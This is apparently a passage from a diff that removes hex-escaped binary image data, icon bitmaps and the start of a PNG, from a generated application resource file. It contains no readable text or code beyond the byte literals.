-\x27\x8d\xb9\x2c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x8d\x4c\x00\x00\x8d\xda\x33\x00\x8d\x93\x17\ -\x04\x8d\xaf\x26\x12\x8d\xb9\x2c\x2c\x8d\xbf\x30\x4f\x8d\xc3\x32\ -\x79\x8d\xc7\x35\xa4\x8d\xca\x37\xc9\x8d\xcd\x38\xe6\x8d\xd0\x3a\ -\xf8\x8d\xd1\x3b\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xca\x36\xc5\x8d\xac\x24\ -\x0f\x8d\xb1\x27\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\x32\x00\x00\x8d\xd9\x2e\ -\x00\x8d\x90\x16\x03\x8d\xaf\x26\x11\x8d\xb9\x2c\x2a\x8d\xbf\x30\ -\x4d\x8d\xc3\x32\x77\x8d\xc7\x35\xa2\x8d\xca\x37\xc8\x8d\xcd\x38\ -\xe5\x8d\xd0\x3a\xf8\x8d\xd1\x3b\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xc7\x34\x9f\x8d\x5e\x00\ -\x02\x8d\xac\x24\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\ -\x00\xff\xff\xff\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\x0d\x00\ -\x00\x8d\xd6\x29\x00\x8d\x8c\x15\x03\x8d\xae\x25\x11\x8d\xb9\x2c\ -\x29\x8d\xbf\x30\x4b\x8d\xc3\x32\x75\x8d\xc7\x35\x9f\x8d\xca\x37\ -\xc5\x8d\xcd\x38\xe3\x8d\xcf\x3a\xf5\x8d\xd1\x3b\xfe\x8d\xd2\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd1\x3b\xff\x8d\xc3\x32\x73\x8d\xd9\x40\ -\x00\x8d\xa6\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\ -\x01\xff\xff\xff\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x8d\x00\x00\x00\x8d\xce\x25\x00\x8d\x89\x13\x03\x8d\xad\x25\ -\x12\x8d\xb8\x2c\x2d\x8d\xbe\x30\x54\x8d\xc3\x32\x83\x8d\xc7\x34\ -\xb4\x8d\xca\x37\xe2\x8d\xc8\x35\xe0\x8d\xba\x2d\x3c\x8d\xbe\x2f\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x01\x7f\xff\xfe\ -\x00\x00\x7f\xff\xfe\xff\xff\xf8\x00\x00\x1f\xff\xff\xff\xff\xe0\ -\x00\x00\x07\xff\xff\xff\xff\x80\x00\x00\x01\xff\xff\xff\xff\x00\ -\x00\x00\x00\x7f\xff\xff\xfc\x00\x00\x00\x00\x3f\xff\xff\xf8\x00\ -\x00\x00\x00\x1f\xff\xff\xf0\x00\x00\x00\x00\x0f\xff\xff\xe0\x00\ -\x00\x00\x00\x07\xff\xff\xc0\x00\x00\x00\x00\x03\xff\xff\xc0\x00\ -\x00\x00\x00\x01\xff\xff\x80\x00\x00\x00\x00\x01\xff\xff\x00\x00\ -\x00\x00\x00\x00\xff\xff\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\ -\x00\x00\x00\x00\x7f\xfe\x00\x00\x00\x00\x00\x00\x7f\xfc\x00\x00\ -\x00\x00\x00\x00\x3f\xfc\x00\x00\x00\x00\x00\x00\x3f\xfc\x00\x00\ -\x00\x00\x00\x00\x1f\xf8\x00\x00\x00\x00\x00\x00\x1f\xf8\x00\x00\ -\x00\x00\x00\x00\x1f\xf8\x00\x00\x00\x00\x00\x00\x1f\xf8\x00\x00\ -\x00\x00\x00\x00\x0f\xf0\x00\x00\x00\x00\x00\x00\x0f\xf0\x00\x00\ -\x00\x00\x00\x00\x0f\xf0\x00\x00\x00\x00\x00\x00\x0f\xf0\x00\x00\ -\x00\x00\x00\x00\x0f\xf0\x00\x00\x00\x00\x00\x00\x0f\xf0\x00\x00\ -\x00\x00\x00\x00\x0f\xf0\x00\x00\x00\x00\x00\x00\x0f\xf0\x00\x00\ -\x00\x00\x00\x00\x0f\xf8\x00\x00\x00\x00\x00\x00\x0f\xf8\x00\x00\ -\x00\x00\x00\x00\x1f\xf8\x00\x00\x00\x00\x00\x00\x1f\xf8\x00\x00\ -\x00\x00\x00\x00\x1f\xfc\x00\x00\x00\x00\x00\x00\x1f\xfc\x00\x00\ -\x00\x00\x00\x00\x3f\xfc\x00\x00\x00\x00\x00\x00\x3f\xfe\x00\x00\ -\x00\x00\x00\x00\x7f\xfe\x00\x00\x00\x00\x00\x00\x7f\xff\x00\x00\ -\x00\x00\x00\x00\x7f\xff\x00\x00\x00\x00\x00\x00\xff\xff\x80\x00\ -\x00\x00\x00\x01\xff\xff\xc0\x00\x00\x00\x00\x01\xff\xff\xc0\x00\ -\x00\x00\x00\x03\xff\xff\xe0\x00\x00\x00\x00\x07\xff\xff\xf0\x00\ -\x00\x00\x00\x0f\xff\xff\xf8\x00\x00\x00\x00\x1f\xff\xff\xfc\x00\ -\x00\x00\x00\x3f\xff\xff\xff\x00\x00\x00\x00\x7f\xff\xff\xf0\x00\ -\x00\x00\x01\xff\xff\xff\xf0\x00\x00\x00\x03\xff\xff\xff\xf0\x00\ -\x00\x00\x0f\xff\xff\xff\xf0\x00\x00\x00\x7f\xff\xff\xff\xf0\x00\ -\x00\x00\xff\xff\xff\xff\xe0\x00\x00\x00\x7f\xff\xff\xff\xe0\x00\ -\x00\x00\x7f\xff\xff\xff\xe0\x00\x00\x00\x7f\xff\xff\xff\xe0\x00\ -\x00\x00\x7f\xff\xff\xff\xf0\x00\x00\x00\x7f\xff\xff\xff\xff\x00\ -\x00\x00\x7f\xff\xff\xff\xff\xf8\x00\x00\x7f\xff\xff\xff\xff\xff\ -\xc0\x00\xff\xff\xff\x7f\xff\xff\xfe\x00\xff\xff\xfe\x89\x50\x4e\ -\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\x00\x01\ -\x00\x00\x00\x01\x00\x08\x06\x00\x00\x00\x5c\x72\xa8\x66\x00\x00\ -\x40\x4b\x49\x44\x41\x54\x78\xda\xed\xbd\x79\x9c\x1d\xd7\x5d\xe0\ -\xfb\x3d\xe7\x54\xd5\xdd\x7b\x53\x77\x6b\x97\x25\xb5\xb5\x78\x89\ -\xb3\x98\x2c\x24\x84\x90\x0d\xcf\x0c\x90\x47\x20\x31\x84\x10\x18\ -\x60\x58\x27\x0c\x79\x13\xf6\xc9\x83\x07\x0c\x5b\x86\x1e\x96\xc0\ -\x10\xde\x30\x90\x04\x02\x44\x26\x0b\x09\x4c\x20\x2f\x84\x00\x21\ -\x21\x89\x63\x67\xb3\xbc\x45\xb6\x64\x59\x96\xb5\x74\xb7\xba\xfb\ -\x6e\xb5\x9c\x73\xe6\x8f\xba\xb7\xd5\x92\x5a\x52\x4b\xba\xb7\xaa\ -\xee\xed\xfa\x7e\x3e\x6d\x6b\x69\x75\x9d\x5b\x55\xbf\xf5\xfc\x7e\ -\xbf\x23\xc8\xc9\xb9\x01\xb6\xbc\x7d\x16\xbf\x01\x23\xd3\x14\xa4\ -\x62\x02\xc1\x0e\x21\x39\x20\x25\x77\x48\xc5\xcd\x42\x31\x82\x45\ -\xea\x90\x27\x8d\xe1\xdd\x42\xf0\x31\x20\x3c\x72\xf7\x9b\xd3\x5e\ -\xfa\x86\xc4\x5a\x7b\xc1\xef\x45\xe7\x0f\x54\xe7\xf7\x5a\x08\x91\ -\xf6\x1a\x73\x32\xca\x96\xdf\x9e\x65\xf9\x2b\x30\xf5\x02\x0a\x42\ -\x30\x8a\x60\xbb\x90\xec\x96\x92\x5b\x85\xe2\x80\x72\xd8\xa7\x1c\ -\xb6\x2b\x8f\x09\xc7\xa3\xa4\x3c\xa4\xec\xbc\x59\x41\x13\x9a\x0b\ -\x9c\x88\x02\x7e\xd6\x1a\xde\x25\x24\xe4\x4a\x20\x79\x3a\xf2\xee\ -\x01\x16\x08\x9d\x55\x7f\x97\x4b\x7e\xce\x0a\x37\xfd\xc9\x6c\xfc\ -\x0b\x41\x41\x48\xc6\x84\x60\x9b\x90\xcc\x54\xb7\x71\x50\x28\x6e\ -\x55\x0e\x7b\x95\xc3\x4e\xe5\x31\xee\x78\x14\x95\x87\x50\x2e\x48\ -\x15\x7f\x5d\x8c\x5b\x04\xe5\xb1\x7d\xe9\x24\xff\x29\x0a\xf8\x07\ -\xe0\x78\xda\x9f\x71\x03\x13\x76\x7f\xe1\x74\x2c\xbe\x4e\x7b\x45\ -\x39\xe9\xb1\xf3\x8f\x67\x31\x11\xc2\x29\xe2\x75\xdc\xf8\xad\x42\ -\xb2\x4f\x4a\xf6\x4b\xc5\xad\xd2\x61\x46\xb9\x6c\x57\xee\xfa\x84\ -\xfd\x72\x14\x2a\xe0\x55\xb8\x35\x0a\x79\x2e\xb9\x02\x48\x85\x8e\ -\xbc\xaf\xc4\x01\xb9\xd5\xdf\x60\xec\xf8\xa3\x59\x82\x36\xa2\x34\ -\x42\x41\x4a\xc6\x3b\x6e\xfc\x8c\x94\xdc\x2a\x1d\x0e\x48\xc5\x3e\ -\xe5\xb2\xb5\xe3\xc6\x7b\x8e\xdb\x11\x76\x07\x84\xbc\xf1\xeb\x37\ -\x17\x60\xe9\x14\x6f\x51\x1e\xbf\x1c\xf9\x79\x18\x90\x36\xce\x8d\ -\xff\x88\x9c\xac\xb2\xe3\x8f\x67\xb1\x1a\xe1\x96\x28\x0a\xc1\xb8\ -\x90\xec\x10\x82\xbd\xc5\x1a\xb7\x49\xc5\x01\xe9\x32\xa3\x1c\xb6\ -\x39\x1e\xe3\xca\xc3\x73\x3c\x84\x74\x40\xf5\x48\xd8\xd7\x42\x79\ -\x20\x14\xb7\xb7\x97\xf0\x9c\x02\x41\xda\xf7\x68\xa3\x93\x2b\x80\ -\x21\xe1\xa6\x3f\x99\xc5\x5a\x84\x94\x14\x85\x64\x42\x48\xb6\x0b\ -\xc1\x3e\xa1\x38\x20\x25\xb7\x49\x97\xdd\xca\x61\x87\xe3\x31\xaa\ -\x3c\x0a\x8e\x07\x5d\x37\xbe\x5f\xc2\xbe\x16\x8e\x0b\xca\x61\xaf\ -\x90\x8c\x02\x67\xd2\xbe\x6f\x1b\x9d\x5c\x01\x0c\x20\xbb\xde\xd5\ -\x11\x76\x45\x51\x4a\x36\x75\x84\x7d\xbf\x50\x1c\x90\x8a\x5b\xa4\ -\xc3\x5e\xe5\xb2\xcd\x71\x19\x73\x3c\x3c\x95\x92\xb0\xaf\x45\xc7\ -\xc3\xd8\x29\x24\xdb\xc9\x15\x40\xea\xe4\x39\x80\x0c\xa3\xde\x3c\ -\xcb\xee\xe7\x43\x73\x01\x51\xa8\x50\x12\xb1\xb0\xef\x10\x82\x9b\ -\x85\xe2\x56\xa9\xd8\x2f\x1d\x6e\x76\x5c\xb6\x28\xaf\x23\xec\x6e\ -\x76\x84\xfd\x72\x2c\x9d\xa2\x55\x9f\xe3\xf5\x42\xf0\x7e\xc8\xf3\ -\x00\x69\x92\x7b\x00\x19\x62\xe7\x3b\x66\x31\x1a\xe1\x16\x29\x0b\ -\xc1\x84\x90\xec\x02\x66\x2a\x9b\xb8\x4d\x2a\xf6\xab\x38\x1b\xbf\ -\x45\x79\x8c\xae\x58\x76\x27\xdb\xc2\xbe\x16\x8e\x47\x49\x48\x6e\ -\x55\x2e\xef\xd7\x79\x16\x20\x55\x72\x05\x90\x12\xbb\xdf\x1d\x6f\ -\xbd\x49\x87\xb2\x90\x6c\x12\x82\x9d\x42\xb2\x5f\x48\x0e\x4a\xc5\ -\x2d\x2a\x8e\xd9\xb7\x29\x8f\xda\x20\x0b\xfb\x25\x88\x38\x11\x28\ -\x15\xb7\xb4\x97\x70\xdd\xe2\xf9\x3d\xe9\x9c\xe4\xc9\x15\x40\x02\ -\xec\xfe\xd3\x59\x8c\x46\x0a\x45\x49\x4a\xa6\x84\x8c\xcb\x65\x9d\ -\x42\x1c\xb3\x2b\x87\xdd\xca\x63\xab\x72\x19\x71\x0a\xb8\xca\x1d\ -\x12\x61\x5f\x0b\xdb\x09\x51\x1c\x6e\x96\x8a\x51\xe0\x6c\xda\x4b\ -\xda\xc8\xe4\x0a\xa0\xc7\xec\x7a\x57\x2c\xec\x8e\x47\x59\x48\x26\ -\x85\x60\x97\x90\xec\x73\xe2\x7d\xf6\xfd\x2a\x4e\xd0\x6d\x56\x2e\ -\xa3\x8e\x87\xe3\x78\x71\x62\x6c\x28\x85\xfd\x32\x48\xb5\x92\x08\ -\xdc\x46\xae\x00\x52\x25\x4f\x02\x5e\x27\xd3\xbf\x3d\x4b\x75\x2b\ -\x04\x0d\xa4\xe3\x51\xed\xb8\xf1\x37\x09\xc9\xcd\x42\x72\x5b\x47\ -\xd8\xf7\x28\x97\xcd\x8e\xc7\x88\xf2\x70\x9c\x4e\x41\x8d\x74\x60\ -\xa3\xb7\x5c\x74\x12\x81\xaf\x13\x82\xbf\x82\x3c\x11\x98\x16\xb9\ -\x07\xb0\x1e\xbe\x73\x96\x99\x57\x43\xd8\x40\x4a\x45\x55\x48\xa6\ -\x84\x60\xa7\x80\x83\xa5\x11\x0e\x88\xd8\x8d\xdf\xa5\x5c\xb6\x3a\ -\x1e\xd5\x15\x61\xef\x66\xe3\x37\xb8\xb0\xaf\x85\xe3\x51\x12\x82\ -\xdb\xa4\xe2\xaf\x4c\x5e\x88\x9e\x1a\xb9\x02\xb8\x88\x4d\xbf\x35\ -\xcb\xd4\x5e\x68\x9e\x43\x49\x45\x45\x48\xa6\x85\x60\x27\x9a\x83\ -\x5e\x99\x83\xca\xe1\xa0\x74\xb8\xc9\xf1\x98\x56\x2e\x35\xc7\xc3\ -\xe9\x26\xe8\x44\x2e\xec\xeb\xe3\x7c\x22\xf0\x80\xdf\xc0\x71\x8b\ -\x44\x69\x2f\x69\xa3\xb2\xa1\x15\xc0\xb6\xff\x39\xcb\xe9\xc7\x61\ -\xeb\x7e\x94\x72\x57\x2c\xfb\xee\xb0\xcd\x3e\xaf\xc2\x6d\x4a\xb1\ -\x4f\x3a\xec\x71\x3c\xa6\x3a\xc2\xae\x2e\x11\x76\xc1\xaa\xd6\x8a\ -\x9c\x75\x71\x3e\x11\x78\x40\x3a\x8c\x91\xe7\x01\x52\x63\xc3\x28\ -\x80\x89\xdf\x98\xe5\x05\x3f\x00\x5f\x7a\x1f\x4a\x79\xd4\x84\x60\ -\x4a\x08\xf6\xdc\xf4\x2c\xf6\xc9\x4e\x51\x8d\x72\xb9\x49\xb9\x4c\ -\x2b\x8f\xaa\xe3\xa1\xba\xd9\xf8\x2b\x0a\x7b\x2e\xfc\xd7\x85\x54\ -\xa0\x5c\xb6\x0b\xc1\x16\x72\x05\x90\x1a\x43\xaa\x00\x66\xd9\x7b\ -\x08\x74\x80\x23\x24\x55\x21\xd8\x2c\x04\x37\x3d\xfc\xb7\x1c\x2c\ -\xd6\x3a\x5b\x6f\x2e\x3b\x3b\xc2\x5e\xc9\x85\x3d\x79\xa4\x04\xc7\ -\x63\x93\x90\xdc\x8c\xe0\xcb\x69\xaf\x67\xa3\x32\xf0\x0a\x60\xcf\ -\x9f\xcd\x12\x45\xa0\x14\x0e\x50\x15\x92\x2d\x42\x70\x93\x80\x83\ -\x5e\x89\x83\xd2\xe1\x40\x27\x41\x37\xd5\xb1\xec\xf2\x12\x61\x5f\ -\x8b\x5c\xd8\xfb\x4b\x9c\x07\x28\x09\xc1\x01\xa5\x60\xe6\xd0\x6c\ -\xbe\x13\x90\x02\x03\xad\x00\xf6\xbe\x67\x16\x01\x63\xae\xe2\x65\ -\x52\xf1\xf5\xca\x65\x7f\xa7\xa8\x66\x93\xe3\x52\x55\x1e\xd2\xf1\ -\x3a\x99\xf8\x3c\x41\x97\x39\x3a\xcf\xe6\xd6\x76\x3d\xaf\x08\x4c\ -\x8b\x81\x55\x00\x33\x87\x66\xc1\x32\x8a\xe0\x57\x8a\x15\xbe\xbb\ -\x34\x4a\xd9\x2d\x9e\x1f\x5c\x91\x27\xe8\xb2\x4f\x27\x11\xb8\x5f\ -\x3a\x8c\x00\x73\x69\xaf\x67\x23\x32\x90\x0a\x60\xe6\xd0\x2c\x42\ -\x80\xb5\xbc\xa6\x50\xe5\x7b\x46\xb7\x50\x54\xdd\x31\x87\xab\xc9\ -\x85\x3f\xd3\x5c\x94\x08\xcc\x15\x40\x0a\x0c\x6c\xf1\x69\xbb\x81\ -\x92\x0e\x2f\x28\x8f\x5d\x46\xf8\x73\x32\x8f\x94\xa0\x5c\x26\x85\ -\x60\x26\xed\xb5\x6c\x54\x06\x56\x01\x60\x51\xd2\x61\x2c\x17\xfe\ -\x01\x46\x80\x53\xa0\x24\x14\x07\x94\xdb\x09\xeb\x72\x12\x65\x60\ -\x15\x80\x10\x58\x6b\x30\x98\xb4\x57\x92\x73\x23\x38\x2e\x48\xc9\ -\xed\xed\xe5\xc1\x0c\x47\x07\x9d\x81\x55\x00\xe3\x3b\x08\x8d\xe6\ -\x09\x1d\x92\xb7\x34\x0d\x30\x2a\xee\x86\x9c\x91\x8a\x91\xb4\xd7\ -\xb2\x11\x19\x48\x05\x70\xe4\xee\x37\xd3\x5c\x00\xa3\x79\x38\x0a\ -\xb0\x79\x08\x30\xb8\x74\x12\x81\xbb\x84\x64\x6b\xda\x6b\xd9\x88\ -\x0c\xa4\x02\x00\xb0\x16\xac\xe1\xc1\x28\x60\xd1\xe6\x0a\x60\x60\ -\xe9\x24\x02\xc7\x85\x60\x07\xe4\x79\x80\xa4\x19\x58\x05\x00\x80\ -\xe5\xb8\x0e\x38\x63\xf3\x76\xd2\xc1\x45\x80\xe3\xe2\x09\xc9\xf8\ -\x46\x19\x88\x92\x25\x06\xfa\x96\x1b\xc3\x59\x1d\x71\x44\xe7\xcd\ -\xa4\x83\x8e\x05\x4c\x1e\xca\x25\xcf\x40\x2b\x80\x37\xbe\x9e\xa6\ -\x89\x78\x28\x0a\xc8\x13\x81\x03\x8a\xb5\x10\xf9\x44\xd6\xe4\xa1\ -\x5c\x1a\x0c\xac\x02\x38\x72\xf7\x9b\xf9\x83\xbf\x04\x6b\x78\x40\ -\x07\xb9\xf5\x18\x38\xe2\x4a\x4e\x5a\x8b\xd0\x6e\xf0\x30\xf0\x50\ -\xda\x4b\xda\x88\x0c\xf4\xde\xab\xb5\x60\x0c\x0f\x47\x01\x75\x6b\ -\x19\xc9\x9b\x7d\x32\x4a\xa7\x27\xc3\x5a\xb0\x1a\x74\x04\x91\x0f\ -\x41\x0b\xdd\x5e\xe6\xcb\x26\xe4\x2d\x5e\x85\x63\x61\x2b\x9f\x0d\ -\x98\x34\x03\xad\x00\x00\xb0\x3c\xa1\x03\x4e\x59\xcd\x88\x18\xfc\ -\x4f\x33\xf8\xac\x21\xec\x3a\x80\xd0\xc7\xea\x80\x46\x14\x32\x6f\ -\x22\x8e\x99\x88\xaf\x18\xc3\xbd\xc0\xdf\x4b\xc9\x23\xb9\xf0\xa7\ -\xc3\xc0\x8b\x8c\x31\x9c\xd1\x11\x8f\xe9\x88\x7d\x72\xe0\x3f\xcd\ -\x80\xd1\xf5\xb8\x2c\x18\x1d\x0b\x7a\x14\x42\xe4\x63\x74\x40\x33\ -\x0a\x39\x6b\x22\x8e\x9b\x88\x87\xad\xe1\x21\x6b\x39\x6c\x2d\xc7\ -\xb0\x9c\x04\x96\x11\x44\xd6\xc0\x63\xaf\xcf\x05\x3f\x2d\x06\x5e\ -\x64\x96\x9f\xa6\xe9\xee\xe6\x61\x1d\x70\x97\x5b\x22\xef\x0b\xe8\ -\x17\xab\x84\xdd\x9a\x8e\xc0\xc7\xc2\x4e\xe8\x43\xd8\x26\xd4\x21\ -\xf7\x59\xcd\x17\x3a\xc2\xfe\x90\xb5\x3c\x0e\x9c\x02\x96\x5c\x17\ -\xbd\xbc\x04\x27\xbf\x37\x17\xf6\x2c\x31\xf0\x0a\x60\x7c\x17\x58\ -\xcd\x97\xa3\x38\x11\x38\xb0\x49\xcd\x4c\xb1\x86\xb0\x47\xc1\x8a\ -\x2b\xbf\x62\xe9\x4d\x14\xff\x7d\xe7\x7b\x35\xf0\x3b\xe7\x4e\xf1\ -\xe7\x73\x7f\x89\xbd\xe9\xfb\xe1\xd8\x1b\x72\x61\xcf\x3a\x03\x9f\ -\x36\x9b\x39\x34\x8b\x31\xbc\xa4\x32\xce\x87\x46\xb7\x52\xcb\x13\ -\x81\xd7\xc8\xc5\xc2\x1e\xc5\xc2\xdd\x15\xf6\x28\x88\x2d\xfd\x45\ -\xc2\x7e\xe9\x9b\x13\xc7\xfe\x3f\x8b\xe0\x57\xb1\x79\x3c\x3f\x28\ -\x0c\xbc\x07\x00\x80\xe1\xa8\x0e\x79\xda\x1a\x6a\x42\xa5\xbd\x98\ -\x0c\x73\x91\xb0\xeb\x08\x4c\x08\x61\x10\xbb\xf2\x91\xdf\xf9\xb3\ -\xae\xb0\xdb\x8b\xfe\x1d\x97\xf9\xfd\x79\x6e\xc3\xe2\x01\xf9\x99\ -\xbf\x03\xc2\x50\x28\x00\x6b\x38\xab\x43\x8e\xe9\x90\x7d\x32\x57\ -\x00\x31\x6b\x08\xbb\x0e\x63\x8b\xbe\x22\xec\x61\xec\xde\x5f\xd6\ -\xb2\x5f\x8b\x37\x15\x2b\x8b\x19\x60\x84\x7c\xcc\xf7\xc0\x30\x14\ -\x0a\xe0\x25\xaf\xa7\xf1\x2f\xef\xe5\xb0\x0e\x79\xc5\x86\x4c\x04\ -\xae\x9a\x7d\xb8\xda\x8d\x8f\x02\x88\xda\xab\xdc\x78\x7d\xde\xb2\ -\xaf\x69\xdc\xd7\x10\xf8\x95\x90\x4a\x5c\x3a\x54\x75\xa5\x72\xaf\ -\xb3\xed\x87\x65\xaf\xb5\xbc\xd2\x5a\x3e\xb1\xfb\xdd\xb3\x73\x3a\ -\xa4\x25\x1d\xec\xb1\xef\xcc\xc3\x81\xac\x32\xf0\x11\xf3\x4a\xf7\ -\x98\xe5\x07\x6b\xd3\xfc\x7e\x75\x72\xf0\x3f\xd3\x15\xb9\x9c\x65\ -\xef\x58\xf5\x0b\x62\x76\x7b\x5e\x48\x85\x38\x3f\x2c\x55\xc8\xb8\ -\x0b\x4f\x74\x4e\x24\xee\xfe\x5e\xae\xfa\xfd\xca\x97\xb8\x70\xc8\ -\xea\xaa\xcb\x9f\xdf\xef\xb7\x1d\xa5\xd3\xc6\x46\x01\x8b\x3a\xe2\ -\xb8\xd1\x3c\x6e\x0d\x0f\x5a\xcd\x83\xc6\x72\x18\xc3\x31\xa3\x99\ -\xf7\x2a\x44\x8f\xfe\x6f\xe0\x0f\x73\xa5\x90\x05\x86\x42\x58\x66\ -\x0e\xcd\x62\x0d\x5f\x57\x1e\xe7\x83\x63\x5b\xa9\x0d\xc7\xa7\xe2\ -\x9a\x85\x1d\x3a\xc2\xac\x3a\x5f\x4e\x67\xe2\x4e\xe7\x44\x62\xe5\ -\x9c\x9f\x9a\x2c\x3b\x02\xbe\x22\xd4\xd7\xeb\xfa\xaf\x66\x75\x6e\ -\xe1\xfc\x5a\xc3\x28\x60\x2e\x0a\x38\xa6\x43\x3e\x67\x35\xf7\x1b\ -\xc3\xfd\xc0\x31\x6b\x98\x07\xcc\xd1\xbc\x0e\x20\x35\x86\x42\x54\ -\x66\x0e\xcd\x62\x22\x76\x17\x47\xf8\xe8\xf8\x0e\x66\x06\x32\x0f\ -\x70\x91\x1b\x7f\x89\xb0\x77\x63\x76\x13\x0b\xbb\x10\xe7\x05\xda\ -\xf1\xe2\x11\xdb\xdd\x73\x0b\xa5\xb3\xca\x9a\xaf\x72\xe1\xe3\x1f\ -\x9e\xfc\x47\xb3\x66\x55\xcd\x40\x9b\x28\xf4\x39\xab\x03\xbe\xa2\ -\x43\x3e\x69\x0c\x9f\xb4\x86\xfb\xb0\x9c\x02\x02\x04\x3c\xfe\xba\ -\x5c\x21\x24\xc5\xd0\x28\x00\x1d\x52\xf5\xca\x7c\x60\x7c\x07\x2f\ -\x77\x8b\x69\xaf\xe8\x2a\xac\x12\x76\xa3\x57\x55\xd1\x05\xab\x2c\ -\x7b\x10\x0b\x3b\x36\x76\xd5\x55\x47\xd0\x1d\x0f\x54\xa1\x23\xf0\ -\xab\x04\x7d\xe5\xe7\x42\xe6\x73\x20\xdd\xcf\x1b\xb6\xb1\x41\x93\ -\x46\x14\xf0\x58\x14\x70\xaf\xd1\xfc\xff\x58\x3e\x6d\x34\x4f\x08\ -\x89\xce\x15\x41\xff\x19\x1a\x05\xf0\xe3\xaf\x85\xd9\xf7\xf2\xb6\ 